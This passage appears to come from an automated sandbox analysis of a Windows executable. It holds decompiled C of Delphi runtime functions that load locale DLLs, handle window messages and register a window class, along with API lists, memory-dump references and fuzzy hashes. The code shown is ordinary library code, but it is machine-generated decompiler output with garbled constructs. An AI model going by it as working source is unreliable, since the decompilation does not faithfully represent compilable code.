                            lstrcpynA(_t100, &_v17, 0x105 - _t100 - &_v289);
                            _t81 = LoadLibraryExA( &_v289, 0, "true"); // executed
                            _t112 = _t81;
                            if(_t112 == 0) {
                                _v15 = 0;
                                lstrcpynA(_t100, &_v17, 0x105 - _t100 - &_v289);
                                _t88 = LoadLibraryExA( &_v289, 0, "true"); // executed
                                _t112 = _t88;
                            }
                        }
                    }
                }
                return _t112;
            } else {
                goto L3;
            }
        }
    }
}


                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00400000,00461790), ref: 00405E9C
                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405EBA
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405ED8
                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405EF6
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405F3F
                                                                            • RegQueryValueExA.ADVAPI32(?,004060EC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001), ref: 00405F5D
                                                                            • RegCloseKey.ADVAPI32(?,00405F8C,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405F7F
                                                                            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405F9C
                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405FA9
                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405FAF
                                                                            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405FDA
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406021
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406031
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406059
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406069
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0040608F
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?), ref: 0040609F
                                                                            Strings
                                                                            • Software\Borland\Locales , xrefs: 00405EB0, 00405ECE
                                                                            • Software\Borland\Delphi\Locales , xrefs: 00405EEC
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                            • API String ID: 1759228003-2375825460
                                                                            • Opcode ID: e85b8b5f18f98d11f77dd4a75a6bfc4e909d9d51afbd20e7fd9dae12ec9badaa
                                                                            • Instruction ID: 78b8716c1d6b3f78e059c23326c5bad80ecdfc9d22bb9ed19f786db41dfff9de
                                                                            • Opcode Fuzzy Hash: e85b8b5f18f98d11f77dd4a75a6bfc4e909d9d51afbd20e7fd9dae12ec9badaa
                                                                            • Instruction Fuzzy Hash: 6A516F75A4021D7AFB21D6A48C46FEF7BEC9B04744F4401B7BA04F61C2E67C9E448B69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 95%
                                                                                                                                  E0045603C(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) { 				struct HWND__* _v8; 				struct HWND__* _v12; 				void* __ebx; 				void* __esi; 				void* __ebp; 				signed int _t161; 				struct HWND__* _t162; 				struct HWND__* _t163; 				void* _t166; 				struct HWND__* _t176; 				struct HWND__* _t185; 				struct HWND__* _t188; 				struct HWND__* _t189; 				struct HWND__* _t191; 				struct HWND__* _t197; 				struct HWND__* _t199; 				struct HWND__* _t202; 				struct HWND__* _t205; 				struct HWND__* _t206; 				struct HWND__* _t216; 				struct HWND__* _t217; 				struct HWND__* _t222; 				struct HWND__* _t224; 				struct HWND__* _t227; 				struct HWND__* _t231; 				struct HWND__* _t239; 				struct HWND__* _t248; 				struct HWND__* _t252; 				struct HWND__* _t254; 				struct HWND__* _t255; 				struct HWND__* _t267; 				intOrPtr _t270; 				struct HWND__* _t273; 				struct HWND__* _t274; 				struct HWND__* _t276; 				intOrPtr* _t277; 				struct HWND__* _t285; 				struct HWND__* _t287; 				void* _t307; 				signed int _t309; 				struct HWND__* _t315; 				struct HWND__* _t316; 				struct HWND__* _t317; 				void* _t318; 				intOrPtr _t342; 				struct HWND__* _t346; 				intOrPtr _t368; 				void* _t372; 				struct HWND__* _t377; 				void* _t378; 				void* _t379; 				intOrPtr _t380;  				_t318 = __ecx; 				_push(_t372); 				_v12 = __edx; 				_v8 = __eax; 				_push(_t379); 				_push(0x456706); 				_push( *[fs:edx]); 				 *[fs:edx] = _t380; 				 *(_v12 + 0xc) = 0; 				_t307 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xb0)) + 8)) - 1; 				if(_t307 < 0) { 					L5: 					L00455EF0(_v8, _t318, _v12); 					_t309 =  *_v12; 					_t161 = _t309; 					__eflags = _t161 - 0x53; 					if(__eflags > 0) { 						__eflags = _t161 - 0xb017; 						if(__eflags > 0) { 							__eflags = _t161 - 0xb020; 							if(__eflags > 0) { 								_t162 = _t161 - 0xb031; 								
__eflags = _t162; 								if(_t162 == 0) { 									_t163 = _v12; 									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1; 									if( *((intOrPtr*)(_t163 + 4)) != 1) { 										 *(_v8 + 0xb8) =  *(_v12 + 8); 									} else { 										 *(_v12 + 0xc) =  *(_v8 + 0xb8); 									} 									L105: 									_t166 = 0; 									_pop(_t342); 									 *[fs:eax] = _t342; 									goto L106; 								} 								__eflags = _t162 + 0xfffffff2 - 2; 								if(_t162 + 0xfffffff2 - 2 < 0) { 									 *(_v12 + 0xc) = E00458554(_v8,  *(_v12 + 8), _t309) & 0x0000007f; 								} else { 									L104: 									E00455FB4(_t379); // executed 								} 								goto L105; 							} 							if(__eflags == 0) { 								_t176 = _v12; 								__eflags =  *(_t176 + 4); 								if( *(_t176 + 4) != 0) { 									E00456E20(_v8, _t318,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4))); 								} else { 									E00456DC4(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4))); 								} 								goto L105; 							} 							_t185 = _t161 - 0xb01a; 							__eflags = _t185; 							if(_t185 == 0) { 								_t188 = IsIconic( *(_v8 + 0x30)); 								__eflags = _t188; 								if(_t188 == 0) { 									_t189 = GetFocus(); 									_t346 = _v8; 									__eflags = _t189 -  *((intOrPtr*)(_t346 + 0x30)); 									if(_t189 ==  *((intOrPtr*)(_t346 + 0x30))) { 										_t191 = E0044CB68(0); 										__eflags = _t191; 										if(_t191 != 0) { 											SetFocus(_t191); 										} 									} 								} 								goto L105; 							} 							__eflags = _t185 == 5; 							if(_t185 == 5) { 								L93: 								E00457374(_v8,  *(_v12 + 8),  *(_v12 + 4) & 0x0000ffff); 								goto L105; 							} else { 								goto L104; 							} 						} 						if(__eflags == 0) { 							_t197 =  *(_v8 + 0x44); 							__eflags = _t197; 							if(_t197 != 0) { 								_t311 = _t197; 								_t199 = E004423F8(_t197); 								__eflags = _t199; 								if(_t199 != 0) { 									_t202 = IsWindowEnabled(E004423F8(_t311)); 									__eflags = 
_t202; 									if(_t202 != 0) { 										_t205 = IsWindowVisible(E004423F8(_t311)); 										__eflags = _t205; 										if(_t205 != 0) { 											 *0x4626c0 = 0; 											_t206 = GetFocus(); 											SetFocus(E004423F8(_t311)); 											E0043BC9C(_t311,  *(_v12 + 4), 0x112,  *(_v12 + 8)); 											SetFocus(_t206); 											 *0x4626c0 = 1; 											 *(_v12 + 0xc) = 1; 										} 									} 								} 							} 							goto L105; 						} 						__eflags = _t161 - 0xb000; 						if(__eflags > 0) { 							_t216 = _t161 - 0xb001; 							__eflags = _t216; 							if(_t216 == 0) { 								_t217 = _v8; 								__eflags =  *((short*)(_t217 + 0x132)); 								if( *((short*)(_t217 + 0x132)) != 0) { 									 *((intOrPtr*)(_v8 + 0x130))(); 								} 								goto L105; 							} 							__eflags = _t216 == 0x15; 							if(_t216 == 0x15) { 								_t222 = E00456B84(_v8, _t318, _v12); 								__eflags = _t222; 								if(_t222 != 0) { 									 *(_v12 + 0xc) = 1; 								} 								goto L105; 							} else { 								goto L104; 							} 						} 						if(__eflags == 0) { 							_t224 = _v8; 							__eflags =  *((short*)(_t224 + 0x13a)); 							if( *((short*)(_t224 + 0x13a)) != 0) { 								 *((intOrPtr*)(_v8 + 0x138))(); 							} 							goto L105; 						} 						_t227 = _t161 - 0x112; 						__eflags = _t227; 						if(_t227 == 0) { 							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020; 							__eflags = _t231; 							if(_t231 == 0) { 								E0045676C(_v8); 							} else { 								__eflags = _t231 == 0x100; 								if(_t231 == 0x100) { 									E00456830(_v8); 								} else { 									E00455FB4(_t379); 								} 							} 							goto L105; 						} 						_t239 = _t227 + 0xffffffe0 - 7; 						__eflags = _t239; 						if(_t239 < 0) { 							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t309 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8)); 							goto L105; 						} 						__eflags = _t239 == 0x1e1; 						if(_t239 == 0x1e1) { 							E0042DCD8(E0042DB74()); 							goto L105; 						} else { 					
		goto L104; 						} 					} 					if(__eflags == 0) { 						goto L93; 					} 					__eflags = _t161 - 0x14; 					if(__eflags > 0) { 						__eflags = _t161 - 0x1d; 						if(__eflags > 0) { 							_t248 = _t161 - 0x37; 							__eflags = _t248; 							if(_t248 == 0) { 								 *(_v12 + 0xc) = E00456750(_v8); 								goto L105; 							} 							__eflags = _t248 == 0x13; 							if(_t248 == 0x13) { 								_t252 = _v12; 								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t252 + 8)))) - 0xde534454; 								if( *((intOrPtr*)( *((intOrPtr*)(_t252 + 8)))) == 0xde534454) { 									_t254 = _v8; 									__eflags =  *((char*)(_t254 + 0xa6)); 									if( *((char*)(_t254 + 0xa6)) != 0) { 										_t255 = _v8; 										__eflags =  *(_t255 + 0xa8); 										if( *(_t255 + 0xa8) != 0) { 											 *(_v12 + 0xc) = 0; 										} else { 											_t315 = E0040DDC0("vcltest3.dll", _t309, 0x8000); 											 *(_v8 + 0xa8) = _t315; 											__eflags = _t315; 											if(_t315 == 0) { 												 *(_v12 + 0xc) = GetLastError(); 												 *(_v8 + 0xa8) = 0; 											} else { 												 *(_v12 + 0xc) = 0; 												_t377 = GetProcAddress( *(_v8 + 0xa8), "RegisterAutomation"); 												_t316 = _t377; 												__eflags = _t377; 												if(_t377 != 0) { 													_t267 =  *(_v12 + 8); 													_t316->i( *((intOrPtr*)(_t267 + 4)),  *((intOrPtr*)(_t267 + 8))); 												} 											} 										} 									} 								} 								goto L105; 							} else { 								goto L104; 							} 						} 						if(__eflags == 0) { 							_t270 =  *0x466584; // 0x26e66a0 							E00455244(_t270); 							E00455FB4(_t379); 							goto L105; 						} 						_t273 = _t161 - 0x16; 						__eflags = _t273; 						if(_t273 == 0) { 							_t274 = _v12; 							__eflags =  *(_t274 + 4); 							if( *(_t274 + 4) != 0) { 								E0040D818(); 								E00404648(); 							} 							goto L105; 						} 						_t276 = _t273 - 4; 						__eflags = _t276; 						if(_t276 == 0) { 							_t277 =  *0x462ed4; // 
0x4664ec 							E00447478( *_t277, _t318,  *(_v12 + 4)); 							L00455F48(_v8, _t309, _t318, _v12, _t372); 							E00455FB4(_t379); 							goto L105; 						} 						__eflags = _t276 == 2; 						if(_t276 == 2) { 							E00455FB4(_t379); 							_t285 = _v12; 							__eflags =  *((intOrPtr*)(_t285 + 4)) - 1; 							asm("sbb eax, eax"); 							 *((char*)(_v8 + 0xa5)) = _t285 + 1; 							_t287 = _v12; 							__eflags =  *(_t287 + 4); 							if( *(_t287 + 4) == 0) { 								E00455CBC(); 								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0); 							} else { 								E00455D1C(_v8); 								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0); 							} 							goto L105; 						} else { 							goto L104; 						} 					} 					if(__eflags == 0) { 						 *_v12 = 0x27; 						E00455FB4(_t379); 						goto L105; 					} 					__eflags = _t161 - 0x11; 					if(_t161 > 0x11) { 						goto L104; 					} 					switch( *((intOrPtr*)(_t161 * 4 +  &M004560E0))) { 						case 0: 							0 = E0042048C(0, __ebx, __edi, __esi); 							goto L105; 						case 1: 							goto L104; 						case 2: 							_push(0); 							_push(0); 							_push(0xb01a); 							_v8 =  *(_v8 + 0x30); 							_push( *(_v8 + 0x30)); 							L0040717C(); 							__eax = E00455FB4(__ebp); 							goto L105; 						case 3: 							__eax = _v12; 							__eflags =  *(__eax + 4); 							if( *(__eax + 4) == 0) { 								__eax = E00455FB4(__ebp); 								__eax = _v8; 								__eflags =  *(__eax + 0xb4); 								if( *(__eax + 0xb4) == 0) { 									__eflags =  *0x4626d4; 									if( *0x4626d4 == 0) { 										__eax = _v8; 										__eax =  *(_v8 + 0x30); 										__eax = E0044CA08( *(_v8 + 0x30), __ebx, __edi, __esi); 										__edx = _v8; 										 *(_v8 + 0xb4) = __eax; 									} 								} 								_v8 = L00455CC4(); 							} else { 								__eflags =  *0x4626d4; 								if( *0x4626d4 == 0) { 									_v8 = E00455D1C(_v8); 									__eax = _v8; 									__eax =  *(_v8 + 0xb4); 									__eflags = __eax; 									if(__eax != 0) { 										__eax = _v8; 
										__edx = 0; 										__eflags = 0; 										 *(_v8 + 0xb4) = 0; 									} 								} 								__eax = E00455FB4(__ebp); 							} 							goto L105; 						case 4: 							__eax = _v8; 							__eax =  *(_v8 + 0x30); 							_push(__eax); 							L004070DC(); 							__eflags = __eax; 							if(__eax == 0) { 								__eax = E00455FB4(__ebp); 							} else { 								__eax = L00455FF0(__ebp); 							} 							goto L105; 						case 5: 							__eax = _v8; 							__eax =  *(_v8 + 0x44); 							__eflags = __eax; 							if(__eax != 0) { 								__eax = E004532AC(__eax, __ecx); 							} 							goto L105; 						case 6: 							__eax = _v12; 							 *(_v12 + 0xc) = 1; 							goto L105; 					} 				} else { 					_t317 = _t307 + 1; 					_t378 = 0; 					L2: 					L2: 					if( *((intOrPtr*)(E0041A80C( *((intOrPtr*)(_v8 + 0xb0)), _t378)))() == 0) { 						goto L4; 					} else { 						_t166 = 0; 						_pop(_t368); 						 *[fs:eax] = _t368; 					} 					L106: 					return _t166; 					L4: 					_t378 = _t378 + 1; 					_t317 = _t317 - 1; 					__eflags = _t317; 					if(_t317 != 0) { 						goto L2; 					} 					goto L5; 				} 			}                        

                                                                            0x0045617c
                                                                            0x004561a7
                                                                            0x004561a7
                                                                            0x004561ac
                                                                            0x004565c2
                                                                            0x004565c5
                                                                            0x004565cd
                                                                            0x004565df
                                                                            0x004565df
                                                                            0x00000000
                                                                            0x004565cd
                                                                            0x004561b2
                                                                            0x004561b5
                                                                            0x004564e5
                                                                            0x004564ea
                                                                            0x004564ec
                                                                            0x004564f5
                                                                            0x004564f5
                                                                            0x00000000
                                                                            0x004561bb
                                                                            0x00000000
                                                                            0x004561bb
                                                                            0x004561b5
                                                                            0x0045617e
                                                                            0x0045659a
                                                                            0x0045659d
                                                                            0x004565a5
                                                                            0x004565b7
                                                                            0x004565b7
                                                                            0x00000000
                                                                            0x004565a5
                                                                            0x00456184
                                                                            0x00456184
                                                                            0x00456189
                                                                            0x0045620d
                                                                            0x0045620d
                                                                            0x00456212
                                                                            0x00456220
                                                                            0x00456214
                                                                            0x00456214
                                                                            0x00456219
                                                                            0x0045622d
                                                                            0x0045621b
                                                                            0x00456238
                                                                            0x0045623d
                                                                            0x00456219
                                                                            0x00000000
                                                                            0x00456212
                                                                            0x0045618e
                                                                            0x0045618e
                                                                            0x00456191
                                                                            0x004563d7
                                                                            0x00000000
                                                                            0x004563d7
                                                                            0x00456197
                                                                            0x0045619c
                                                                            0x004566e5
                                                                            0x00000000
                                                                            0x004561a2
                                                                            0x00000000
                                                                            0x004561a2
                                                                            0x0045619c
                                                                            0x004560bf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004560c5
                                                                            0x004560c8
                                                                            0x00456128
                                                                            0x0045612b
                                                                            0x00456153
                                                                            0x00456153
                                                                            0x00456156
                                                                            0x004562a3
                                                                            0x00000000
                                                                            0x004562a3
                                                                            0x0045615c
                                                                            0x0045615f
                                                                            0x0045640a
                                                                            0x00456410
                                                                            0x00456416
                                                                            0x0045641c
                                                                            0x0045641f
                                                                            0x00456426
                                                                            0x0045642c
                                                                            0x0045642f
                                                                            0x00456436
                                                                            0x004564b6
                                                                            0x00456438
                                                                            0x00456447
                                                                            0x0045644c
                                                                            0x00456452
                                                                            0x00456454
                                                                            0x0045649e
                                                                            0x004564a6
                                                                            0x00456456
                                                                            0x0045645b
                                                                            0x00456472
                                                                            0x00456474
                                                                            0x00456476
                                                                            0x00456478
                                                                            0x00456481
                                                                            0x0045648f
                                                                            0x0045648f
                                                                            0x00456478
                                                                            0x00456454
                                                                            0x00456436
                                                                            0x00456426
                                                                            0x00000000
                                                                            0x00456165
                                                                            0x00000000
                                                                            0x00456165
                                                                            0x0045615f
                                                                            0x0045612d
                                                                            0x004566cd
                                                                            0x004566d2
                                                                            0x004566d8
                                                                            0x00000000
                                                                            0x004566dd
                                                                            0x00456133
                                                                            0x00456133
                                                                            0x00456136
                                                                            0x004563df
                                                                            0x004563e2
                                                                            0x004563e6
                                                                            0x004563ec
                                                                            0x004563f1
                                                                            0x004563f1
                                                                            0x00000000
                                                                            0x004563e6
                                                                            0x0045613c
                                                                            0x0045613c
                                                                            0x0045613f
                                                                            0x004566ad
                                                                            0x004566b4
                                                                            0x004566bf
                                                                            0x004566c5
                                                                            0x00000000
                                                                            0x004566ca
                                                                            0x00456145
                                                                            0x00456148
                                                                            0x004562cd
                                                                            0x004562d3
                                                                            0x004562d6
                                                                            0x004562da
                                                                            0x004562e0
                                                                            0x004562e6
                                                                            0x004562e9
                                                                            0x004562ed
                                                                            0x00456314
                                                                            0x00456329
                                                                            0x004562ef
                                                                            0x004562f2
                                                                            0x00456307
                                                                            0x00456307
                                                                            0x00000000
                                                                            0x0045614e
                                                                            0x00000000
                                                                            0x0045614e
                                                                            0x00456148
                                                                            0x004560ca
                                                                            0x00456286
                                                                            0x0045628d
                                                                            0x00000000
                                                                            0x00456292
                                                                            0x004560d0
                                                                            0x004560d3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004560d9
                                                                            0x00000000
                                                                            0x004566ee
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004562ab
                                                                            0x004562ad
                                                                            0x004562af
                                                                            0x004562b7
                                                                            0x004562ba
                                                                            0x004562bb
                                                                            0x004562c1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00456333
                                                                            0x00456336
                                                                            0x0045633a
                                                                            0x00456377
                                                                            0x0045637d
                                                                            0x00456380
                                                                            0x00456387
                                                                            0x00456389
                                                                            0x00456390
                                                                            0x00456392
                                                                            0x00456395
                                                                            0x00456398
                                                                            0x0045639d
                                                                            0x004563a0
                                                                            0x004563a0
                                                                            0x00456390
                                                                            0x004563a9
                                                                            0x0045633c
                                                                            0x0045633c
                                                                            0x00456343
                                                                            0x00456348
                                                                            0x0045634d
                                                                            0x00456350
                                                                            0x00456356
                                                                            0x00456358
                                                                            0x0045635f
                                                                            0x00456362
                                                                            0x00456362
                                                                            0x00456364
                                                                            0x00456364
                                                                            0x00456358
                                                                            0x0045636b
                                                                            0x00456370
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0045625b
                                                                            0x0045625e
                                                                            0x00456261
                                                                            0x00456262
                                                                            0x00456267
                                                                            0x00456269
                                                                            0x00456278
                                                                            0x0045626b
                                                                            0x0045626c
                                                                            0x00456271
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00456243
                                                                            0x00456246
                                                                            0x00456249
                                                                            0x0045624b
                                                                            0x00456251
                                                                            0x00456251
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004563fb
                                                                            0x004563fe
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00456072
                                                                            0x00456072
                                                                            0x00456073
                                                                            0x00000000
                                                                            0x00456075
                                                                            0x00456091
                                                                            0x00000000
                                                                            0x00456093
                                                                            0x00456093
                                                                            0x00456095
                                                                            0x00456098
                                                                            0x00456098
                                                                            0x0045671b
                                                                            0x00456721
                                                                            0x004560a0
                                                                            0x004560a0
                                                                            0x004560a1
                                                                            0x004560a1
                                                                            0x004560a2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004560a2

                                                                            Strings
                                                                            • dF , xrefs: 004566AD
                                                                            • vcltest3.dll , xrefs: 0045643D
                                                                            • RegisterAutomation , xrefs: 0045645E
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RegisterAutomation$vcltest3.dll$dF
                                                                            • API String ID: 0-2619585711
                                                                            • Opcode ID: bebbeda00556289de3349cc0c43b19427dd01e6f62d31d66b9211dfcce096cd8
                                                                            • Instruction ID: c862d983367047c7d83d43d7369f119c2f1ed98460a64e58c2bee91e03f6acd7
                                                                            • Opcode Fuzzy Hash: bebbeda00556289de3349cc0c43b19427dd01e6f62d31d66b9211dfcce096cd8
                                                                            • Instruction Fuzzy Hash: D0E18074A00204EFD700DF69C585A5EB7F1AF08315FA681AAEC049B367C739EE49DB09
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 41%
E00455934(void* __eax, void* __ebx, void* __ecx) {
	struct _WNDCLASSA _v44;
	char _v48;
	char* _t22;
	CHAR* _t26;
	struct HINSTANCE__* _t27;
	intOrPtr* _t29;
	signed int _t32;
	intOrPtr* _t33;
	signed int _t36;
	struct HINSTANCE__* _t37;
	void* _t39;
	CHAR* _t40;
	struct HWND__* _t41;
	char* _t47;
	char* _t52;
	long _t55;
	long _t59;
	struct HINSTANCE__* _t62;
	intOrPtr _t64;
	void* _t69;
	struct HMENU__* _t70;
	intOrPtr _t77;
	void* _t83;
	short _t88;

	_v48 = 0;
	_t69 = __eax;
	_push(_t83);
	_push(0x455ad5);
	_push( *[fs:eax]);
	 *[fs:eax] = _t83 + 0xffffffd4;
	if( *((char*)(__eax + 0xac)) != 0) {
		L13:
		_pop(_t77);
		 *[fs:eax] = _t77;
		_push(0x455adc);
		return E0040473C( &_v48);
	}
	_t22 =  *0x462e14; // 0x46304c
	if( *_t22 != 0) {
		goto L13;
	}
	 *(_t69 + 0x40) = E00421724(E0045603C, __eax);
	 *0x4627b4 = L00406E54;
	_t26 =  *0x4627d4; // 0x4555d0
	_t27 =  *0x4657f8; // 0x400000
	if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
		_t62 =  *0x4657f8; // 0x400000
		 *0x4627c0 = _t62;
		_t88 = RegisterClassA(0x4627b0);
		if(_t88 == 0) {
			_t64 =  *0x462b54; // 0x423558
			E00406740(_t64,  &_v48);
			E0040C11C(_v48, 1);
			E00404184();
		}
	}
	_t29 =  *0x462c28; // 0x466310
	_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
	if(_t88 < 0) {
		asm("adc eax, 0x0");
	}
	_t33 =  *0x462c28; // 0x466310
	_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
	if(_t88 < 0) {
		asm("adc eax, 0x0");
	}
	_push(_t36);
	_push(0);
	_push(0);
	_push(0);
	_push(0);
	_t37 =  *0x4657f8; // 0x400000
	_push(_t37);
	_push(0);
	_t7 = _t69 + 0x8c; // 0x69746163
	_t39 = E00404C00( *_t7);
	_t40 =  *0x4627d4; // 0x4555d0, executed
	_t41 = E00407364(_t40, _t39); // executed
	 *(_t69 + 0x30) = _t41;
	_t9 = _t69 + 0x8c; // 0x44c90c
	E0040473C(_t9);
	 *((char*)(_t69 + 0xac)) = 1;
	_t11 = _t69 + 0x40; // 0x10cc0000
	_t12 = _t69 + 0x30; // 0xe
	SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
	_t47 =  *0x462cb4; // 0x4664f8
	if( *_t47 != 0) {
		_t55 = E00456750(_t69);
		_t13 = _t69 + 0x30; // 0xe
		SendMessageA( *_t13, 0x80, 1, _t55); // executed
		_t59 = E00456750(_t69);
		_t14 = _t69 + 0x30; // 0xe
		SetClassLongA( *_t14, 0xfffffff2, _t59);
	}
	_t15 = _t69 + 0x30; // 0xe
	_t70 = GetSystemMenu( *_t15, 0);
	DeleteMenu(_t70, 0xf030, 0);
	DeleteMenu(_t70, 0xf000, 0);
	_t52 =  *0x462cb4; // 0x4664f8
	if( *_t52 != 0) {
		DeleteMenu(_t70, 0xf010, 0);
	}
	goto L13;
}


                                                                            APIs
                                                                              • Part of subcall function 00421724: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00421742
                                                                            • GetClassInfoA.USER32 ref: 00455993
                                                                            • RegisterClassA.USER32 ref: 004559AB
                                                                              • Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772
                                                                            • SetWindowLongA.USER32(0000000E,000000FC,10CC0000), ref: 00455A47
                                                                            • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00455A69
                                                                            • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455A7C
                                                                            • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455A87
                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455A96
                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455AA3
                                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455ABA
                                                                            Strings
                                                                            • Tn@ , xrefs: 0045597E
                                                                            • L0F , xrefs: 0045595D
                                                                            • X5B , xrefs: 004559B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                            • String ID: L0F$Tn@$X5B
                                                                            • API String ID: 2103932818-3306811505
                                                                            • Opcode ID: 1061d3b833ce9895d9cf07967922cd786b4ec16f4d71d80d9c33e4b0a42dfe87
                                                                            • Instruction ID: 8b2a45e2b46d75add65d1c0541aee3cefa7279e0c305bd2f6c4295ac0c4b2ff4
                                                                            • Opcode Fuzzy Hash: 1061d3b833ce9895d9cf07967922cd786b4ec16f4d71d80d9c33e4b0a42dfe87
